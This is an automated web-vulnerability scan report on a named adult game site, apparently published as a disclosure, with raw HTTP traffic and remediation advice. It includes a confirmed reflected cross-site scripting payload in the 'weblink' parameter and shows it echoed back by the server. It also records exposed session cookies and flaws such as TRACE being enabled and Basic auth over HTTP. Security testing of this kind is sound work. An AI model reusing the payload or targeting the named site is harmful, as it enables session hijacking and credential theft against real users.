Reflected XSS, www.outcastacademy.com REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL: http://www.outcastacademy.com/
SCAN DATE: 4/21/2011 9:02:48 AM
REPORT DATE: 4/21/2011 9:07:57 AM
SCAN DURATION: 00:00:44
Total Requests:
Average Speed: req/sec.

6 identified, 5 confirmed, 0 critical, 1 informational

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Severity distribution: IMPORTANT 33 %, LOW 50 %, INFORMATION 17 %

GHDB, DORK VULNERABILITIES

URL                   | Parameter | Method | Vulnerability                       | Confirmed
/                     |           |        | Cookie Not Marked As HttpOnly       | Yes
/                     |           |        | PHP Version Disclosure              | No
/                     |           |        | TRACE / TRACK Identified            | Yes
/play/                |           |        | Basic Authorisation over Clear Text | Yes
/promo/               |           |        | Forbidden Resource                  | Yes
/webmasteroutcast.php | weblink   | GET    | Cross-site Scripting                | Yes
Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the user's current session or rewriting the page's HTML on the fly to steal the user's credentials. It happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs to be defined only once and should be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many different environments; the OWASP Reform and Microsoft Anti-Cross-site Scripting libraries are good examples.

- /webmasteroutcast.php

/webmasteroutcast.php CONFIRMED

http://www.outcastacademy.com/webmasteroutcast.php?weblink='%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter | Type | Value
weblink   | GET  | '"--></style></script><script>alert(0x000011)</script>

Request

GET /webmasteroutcast.php?weblink='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000011)%3C/script%3E HTTP/1.1
Referer: http://www.outcastacademy.com/webmasteroutcast.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2293
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Outcast Academy Affiliate Program- Lesson of Passion PREMIUM site by leonizer</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="outcast academy, leonizer, lesson of passion, sex game, sex, date, game, date game, flash game, tokage" /><link href="style_lop.css" rel="stylesheet" type="text/css"><link rel="shortcut icon" href="/favicon.ico"><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><style type="text/css">body {background: #212121 url(back_episodes.jpg) no-repeat center top;font: small calibri, tahoma, arial, sans-serif;margin: 0px 0px 0px 0px;}</style></head><body> <center><div id="web"> <center><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><span class = "big">Welcome to the Outcast Academy Affiliate Program</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br />Outcast Academy is a PREMIUM site of Lesson of Passion games.<br /><strong>It`s very easy to start</strong>. Please follow our 1-2-3 step instruction and start generate income in a minutes.<br /><span class = "medium">So, what are you waiting for? 
Sign up now and become a very bad, bad webmaster :)</span><br /><br /><br /><span class = "big">Why do we think that our program will rock your world?</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br /><span class = "medium">Outstanding conversions</span><br />100% unique and high quality content<br /><br /><span class = "medium">50% commission</span><br />On all refered sales: single payment, recurring and rebills<br /><br /><span class = "medium">Rebills</span><br />We plan regular, weekly updates to keep our devoted users with us<br /><br /><br /><span class = "big">Step 1 - create you affiliate ID</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><form action="https://affiliateadmin.ccbill.com/signup.cgi" method=POST><input type=hidden name=CA value="939539-0000"><!--Place a Group Name or Group ID number in the value for GR toautomatically add new affiliates into a group. The Group must exist in your admin setup for this option to work.--><input type=hidden name=GR value=""><input type=hidden name=page_background value=""><input type=hidden name=page_bgcolor value="#FFFFFF"><input type=hidden name=page_text value="#000000"><input type=hidden name=page_link value="blue"><input type=hidden name=page_vlink value="purple"><input type=hidden name=page_alink value="blue"><input type=hidden name=table_left value="#AEAEFF"><input type=hidden name=table_right value="#FEFFC1"><input type=hidden name=table_text value="#000000"><input type=hidden name=star_color value="#CC0000"><br><br>If you have not yet signed up under a CCBill sponsored affiliate program you can<font size=2><input type=submit value="create a new account"></font><input type=hidden name=second value=1></form><br><br>To load your current data, please enter your ID, username and password.<br><br><form action="https://affiliateadmin.ccbill.com/signup.cgi" method=POST><input type=hidden name=CA value="939539-0000"><!--Place a Group Name or Group ID number in the value for GR 
toautomatically add new affiliates into a group. The Group mustexist in your admin setup for this option to work.--><input type=hidden name=GR value=""><input type=hidden name=page_background value=""><input type=hidden name=page_bgcolor value="#FFFFFF"><input type=hidden name=page_text value="#000000"><input type=hidden name=page_link value="blue"><input type=hidden name=page_vlink value="purple"><input type=hidden name=page_alink value="blue"><input type=hidden name=table_left value="#AEAEFF"><input type=hidden name=table_right value="#FEFFC1"><input type=hidden name=table_text value="#000000"><input type=hidden name=star_color value="#CC0000"><table border=0 cellpadding=4 cellspacing=2 width=30%><tr valign=middle align=left><td bgcolor=#AEAEFF>Current ID</td><td bgcolor=#FEFFC1><input type=text name=EID size=15 maxlength=15></td></tr><tr valign=middle align=left><td bgcolor=#AEAEFF>Username</td><td bgcolor=#FEFFC1><input type=text name=username size=15 maxlength=15></td></tr><tr valign=middle align=left><td bgcolor=#AEAEFF>Password</td><td bgcolor=#FEFFC1><input type=password name=password size=15 maxlength=15></td></tr><tr valign=middle align=left><td>   </td><td><input type=submit value="Retrieve data">    <input type=reset value=Clear></td></tr></table><input type=hidden name=second value=1></form><br /><br /><span class = "big">Step 2 - generate your promo link</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br /><form method=GET>Your CCBILL Affiliate ID:<input type="edit" value="\'\"--></style></script><script>netsparker(0x000011)</script>" name="weblink" />&nbsp;&nbsp;<input type=submit value="Generate your Outcast Academy promo link" /></form><br /><strong>Use this link to promote Outcast Academy</strong>:<br />http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=939539-0003&PA=\'\"--></style></script><script>netsparker(0x000011)</script><br /><br /><br /><span class = "big">Step 3 - place Outcast Academy banners on your site</span><br /><br 
/><img src="outcast_bar.png" border ="0"/><br /><br /><br /><img src="promo/hor_640x110_01.jpg" border ="0"/><br /><br /><img src="promo/hor_640x110_02.jpg" border ="0"/><br /><br /><br /><img src="promo/vert_160x600_01.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_02.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_03.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_04.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_05.jpg" border ="0"/>&nbsp;&nbsp;<br /><br /><img src="promo/vert_160x300_01.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_02.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_03.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_04.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_05.jpg" border ="0"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_01.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_02.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_03.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_04.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_05.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_06.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_07.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_08.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_09.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_10.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_11.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_12.jpg" border ="0" 
width="300" height="300"/>&nbsp;&nbsp;<br /><br /><span class = "big">Need something extra?</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br />In a future we plan to add new promo tools such as episode demos with referal ID`s and more.<br />If you want something more - please just <a href="support.php" target = "_blank" >let us know</a>.<br /><br /><br /><img src="logo_lop.png" border ="0"/><br /><br /><strong>© 2011 Outcast Academy by Lesson of Passion games</strong> <br /><br /><br /><br />
Basic Authorisation over Clear Text

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that the application is using Basic Authorisation over HTTP. Basic Authentication sends username and password in plain text.

Impact

If an attacker can intercept traffic on the network, he/she might be able to steal the users' credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your directories which require authentication to be served only over HTTPS and disable any access to these pages over HTTP.

Remedy

All sensitive data should be transferred only over HTTPS.
- /play/

/play/ CONFIRMED

http://www.outcastacademy.com/play/

Request

GET /play/ HTTP/1.1
Referer: http://www.outcastacademy.com/play/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 401 Authorization Required
Date: Thu, 21 Apr 2011 13:43:46 GMT
Server: Apache/2
WWW-Authenticate: Basic realm="RESTRICTED"
Content-Length: 594
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Authorization Required</title></head><body><h1>Authorization Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.outcastacademy.com Port 80</address></body></html>
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts, so marking a cookie as HttpOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution.
  2. Consider marking all of the cookies used by the application as HttpOnly (after this change, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

- /

/ CONFIRMED

http://www.outcastacademy.com/

Identified Cookie

PHPSESSID

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=d3e38e7bfe299e4c6763cbd45d07e5e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 1735
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Outcast Academy - Lesson of Passion PREMIUM site by leonizer</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="outcast academy, leonizer, lesson of passion, sex game, sex, date, game, date game, flash game, tokage" /><link href="style_lop.css" rel="stylesheet" type="text/css"><link rel="shortcut icon" href="/favicon.ico"><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script></head><body> <noembed><a href="index.php" title="Outcast Academy erotic flash game">Welcome to our academyWe will support your change into a better young woman. With good manners, well educated and ready for life in a modern society. If you are sentenced here... ...it means that you were bad bad girl.</a><a href="girls.php" title="Sexy flash game Outcast Academy">Academy is populated with many young students who were directed here from all over the world. Girls has split themselves ints ome kind of fractions - Models, Emos and more. 
Sometimes there are incidents between them but management tries to keep everything under control.</a></noembed><center><div id="site"> <div id="girlstop"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","480","height","380","src", "flash_girlstop", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_girlstop" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div><div id="slider"><img src="sd_01.jpg"/><img src="sd_02.jpg"/><img src="sd_03.jpg"/><img src="sd_04.jpg"/><img src="sd_05.jpg"/></div><div id="join"><a href="/ccbill"><img src="but_join.png"/ border = "0" title = "Join the Outcast Academy"></a></div><div id="erica"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","290","height","420","src", "flash_erica", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_erica" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div></div><div id="content"><center><a href="/ccbill" class = "red"><img src="but_join.png" border ="0" title = "Join the Outcast Academy"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="/play/index.php" class = "red"><img src="but_members.png" border ="0" title = "Outcast Academy: login for existing customers"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="girls.php" class = "red"><img src="but_more.png" border ="0"/></a>&nbsp;&nbsp;&nbsp;<br /><br /><strong>Do you need our support?</strong> Please <a href="http://lessonofpassion.com/support/index.php?type=outcast" target = "_blank" >contact</a> us.<br /><br /><a href="webmasteroutcast.php"><img src="but_webmasters.png" border ="0"/></a><br /><br />WARNING: This website contains explicit adult material. 
You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. <br /><br /><img src="logo_lop.png" border ="0"/><br /><br /><strong>© 2011 Outcast Academy by Lesson of Passion games</strong> <br /><br /><br /><br /></center></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">try {_uacct = "UA-2399441-30";urchinTracker();} catch(err) {}</script> </body></html>
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities in the version identified. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.
- /

/

http://www.outcastacademy.com/

Extracted Version

PHP/5.2.11

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3b38a206433a44e367bb0cff67776eaf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 1735
Content-Type: text/html


TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses HttpOnly cookies, an attacker can bypass the HttpOnly limitation and read the cookies in an XSS attack.

Remedy

Disable this method on all production systems. Even if the application is not vulnerable to Cross-site Scripting, a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

- /

/ CONFIRMED

http://www.outcastacademy.com/

Request

TRACE / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:45 GMT
Server: Apache/2
Transfer-Encoding: chunked
Content-Type: message/http


TRACE / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /promo/

/promo/ CONFIRMED

http://www.outcastacademy.com/promo/

Request

GET /promo/ HTTP/1.1
Referer: http://www.outcastacademy.com/promo/hor_640x110_01.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Thu, 21 Apr 2011 13:43:46 GMT
Server: Apache/2
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /promo/on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.outcastacademy.com Port 80</address></body></html>